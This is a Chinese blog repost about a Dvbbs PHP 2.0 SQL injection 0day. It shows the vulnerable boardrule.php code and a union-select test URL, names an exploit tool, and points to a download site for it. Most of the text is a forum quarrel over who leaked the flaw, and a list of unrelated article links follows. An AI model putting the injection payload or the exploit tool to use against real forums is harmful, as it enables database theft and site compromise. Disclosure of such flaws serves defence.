由Dvbbs PHP 0day引发的争论
昨天刚刚得到Dvbbs PHP 0day 的资料,看来还是晚了,今天无意间发现了有趣的事情,所以就给大家贴出来。呵呵
漏洞给大家播报下
================================================================
Dvbbs PHP 0day
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相关代码:
function brule() {
    global $dv,$db,$boardid,$lang,$groupboardid;
    $groupboardid=$_GET['groupboardid'];
    if(!empty($_GET['groupboardid'])){
        $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");  

    }
    else{
        $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");   
    }
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version
()/*
利用工具 dvbbs_php2.0_fucker_.exe  MD5 : 6b931f8e00e90cf4b1faa531a59d4b36

=========================================================================================
(应该是0DAY的发现者说的,还有可能是零客的老大 下称作者)题外话:这个0day作为内部信息我只在10号那天在群共享里发了。
之前sniperhg本打算在清明节时发出来,没想到今天下午无意中在鬼仔的blog里看到了这个。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版权信息去掉了之外跟我在群里发的txt几乎一个字都不带差的。居然说是拣的。
东西发就发了,无所谓,也不是多好的东西。
但是就这件事,我非常不爽。
是谁泄露的,我早晚会查个水落石出。
论坛斑竹:
 
跟帖。。。
我X那个人。
鬼仔也不厚道~
鬼仔:
。。。。。。
不是我不厚道,我是没想那么多就发出来了。
不好意思。

作者:
 
说实话
一定得查查谁泄露的
和鬼仔没关系
感觉自己内部群里不应该出现会泄露信息的人
我一直很相信自己人的
现在也不例外
鬼仔:
关于把版权信息去掉的问题,是我确实不知道是你们这里的,我把你们版权信息加上了。
 
内部成员:
 
你还真会捡啊???/
鬼仔:
 
我已经道歉了,没必要这样了吧?
作者:

没意见
看看蟑螂有何意见和想法
游客:
不是内部泄露就是马化腾个J8@!
小蟑螂:

事都过去了。
但是我希望你能告诉是谁给你的。
OK的话就PM给我。不行就当我没说。
我不希望这个人是我群里的。

 
呵呵,如果能联想到一起,那么就更有趣了,最后总结一句话,什么事情就怕出内奸,
 
关于发布的ODAY工具,网上的大都不能用 大家可以到 [url]http://www.520jsj.com[/url]上去下载,也可以到上面的官方去下载哦。
 

转载于:https://blog.51cto.com/blacksnow/65986

由Dvbbs PHP 0day引发的争论相关推荐

  1. “深度学习不能拿来乱用”,Nature论文引发激烈争论

    地应栗 发自 凹非寺  量子位 报道 | 公众号 QbitAI "登上Nature的研究,就是重要的研究,还能有这样的缺陷?" 最近几天,哈佛一篇用深度学习预测余震位置的Natur ...

  2. 实名制引发全球大争论

    实名制风暴正席卷全球.然而,隐私权之争.监管难题.真实身份确认等都在阻挠着实名制的真正实施. 不要再侥幸地认为,置身网络虚拟世界,你将获得完全的自由.因为,"实名制"紧箍咒正向你步 ...

  3. 研究员公开Razer 0day,插入鼠标即可获得Windows管理员权限

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 安全研究员jonhat 在推特上发现了一个 Razer Synapse 0day,用户仅插入 Razer 鼠标或键盘就能获得Windows 管理 ...

  4. 5G基站辐射致癌?一个源自19年前的某权威报告引发的谣言

    编译:邢畅.曹培信 来源:大数据文摘(ID:BigDataDigest) 在这篇文章的内容正式开始之前,文摘菌先带大家看几张图. 你看这根孤独的柱子,其实它是一个通信基站: 再看这个平平无奇的路灯,它 ...

  5. 因员工调薪引发内部矛盾上热搜,茶颜悦色到底怎么了?

    茶颜悦色又又上热搜了,这次不是新品.不是出省也不是闭店,而是因为员工薪资问题上微博热搜. 因为抱怨工资少,茶颜悦色三个最大的老板在七千多人的公司群里和员工吵起来了.老板没吵赢,最后在群里直接通知员工离 ...

  6. 全球15个顶级技术类博客

    1) 生活骇客(Lifehacker) http://www.lifehacker.com 生活骇客(Lifehacker)的座右铭表达了它的全部理念:"不要为技术而生活,要为生活而关注技术 ...

  7. 我是架构师-设计模式-工厂模式-工厂方法

    有款游戏叫模拟人生,我这里就例子就叫北漂人生吧. 北漂人生 规定安家模式 a.结婚 b.买房 c. 买车 d. 生娃 先看几种情况: 1. 我初来帝都,按照北漂人生规则,如果要安家,要遵守 a. 结婚 ...

  8. 《连线》杂志:2015年六大安全威胁预测

    近日,美国<连线>杂志网络版刊文,根据最新趋势对2015年网络安全行业面临的重大安全威胁进行了预测和盘点. 以下为文章全文: 随着新年的钟声在午夜敲响,新一轮安全威胁无疑也将在2015年陆 ...

  9. 百年名校史上第一桩:博士论文抄袭,剥夺学位,涉事中国学者已在国内教书7年...

    转载自:量子位 京都大学,是和东京大学并列的日本唯二顶尖高校,在中国留学圈子里素有"日本清北"之称. 但这所百年名校,却刚刚"破防了",做出历史上第一个撤销博士 ...

最新文章

  1. JAVA写的爬虫小工具
  2. mysql 5.6 初始化_MySQL 5.6 关于登陆的初始化设置
  3. 标准C程序设计七---12
  4. 新建VHDL的Vivado工程
  5. 本篇文档介绍如何手动在ECS实例上部署Java web项目
  6. Individual
  7. BigDecimal的用法
  8. linux 每周日执行脚本,Linux任务计划和周期性任务执行
  9. vue+nodejs 将canvas发布到dlna投屏服务
  10. 【汇编】JMP跳转指令的指令长度、直接转移与间接转移、段内跳转与段间跳转
  11. C++ new与delete的使用规范
  12. 注塑机自学习排程,遗传算法排程,注塑工单排计划,模具排单,注塑APS
  13. 牛牛现在有n张扑克牌-字符串
  14. 通向大规模医疗知识图谱:万字详解天衍实验室知识图谱对齐技术
  15. 有关电脑的英语单词(英汉对照)
  16. python正则表达式的学习
  17. 保研经验贴 某不知名211上岸华南理工大学
  18. linux搭建kubernetes集群(一主二从)
  19. 费马小定理+插板法 - Sum(HDU4704)
  20. 上拉、下拉电阻的原理和作用

热门文章

  1. java实验_Java实验报告(实验一)
  2. python decimal 转 float_python教程之二python数学运算
  3. python生成器函数(generator),python3学习笔记:生成器generator
  4. linux中tags文件能删除吗,Git 详细介绍查看、删除、重命名远程分支和tag
  5. 计算机一级办公软件选择题,计算机一级MSOffice习题
  6. java gson_Java 中 Gson的使用
  7. python最大约数是_python – 找到最大的公约数(赋值错误,我迫切需要你的帮助)
  8. 安全模式 提权_记一次渗透挖洞提权实战
  9. 大数据基础学习三:Ubuntu下安装VMware Tools超详细步骤及需要注意的问题(以ubuntu-18.04.3、Mware Workstation 15.1.0 Pro为例)
  10. 依赖配置中心实现注有@ConfigurationProperties的bean相关属性刷新